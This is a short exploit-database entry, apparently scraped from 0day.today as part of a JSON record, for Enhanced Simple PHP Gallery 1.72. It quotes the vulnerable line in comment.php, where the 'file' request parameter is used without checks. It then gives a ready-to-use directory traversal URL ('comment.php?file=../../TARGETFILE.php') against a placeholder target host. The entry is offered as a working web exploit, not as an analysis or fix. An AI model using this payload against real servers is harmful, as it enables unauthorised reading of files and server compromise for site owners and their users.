(Enhanced Simple PHP Gallery) 1.72\r\n\r\n => Vendor: http://quirm.net\r\n \r\n => Download: http://quirm.net/download/21/\r\n\r\n => Bugfounder: bd0rk\r\n\r\n => Vulnerable Code in comment.php line 3\r\n\r\n -------------------------\r\n\r\n $fileid = $_GET['file'];\r\n\r\n -------------------------\r\n\r\n\r\n\r\n[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php\r\n\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4701"}]}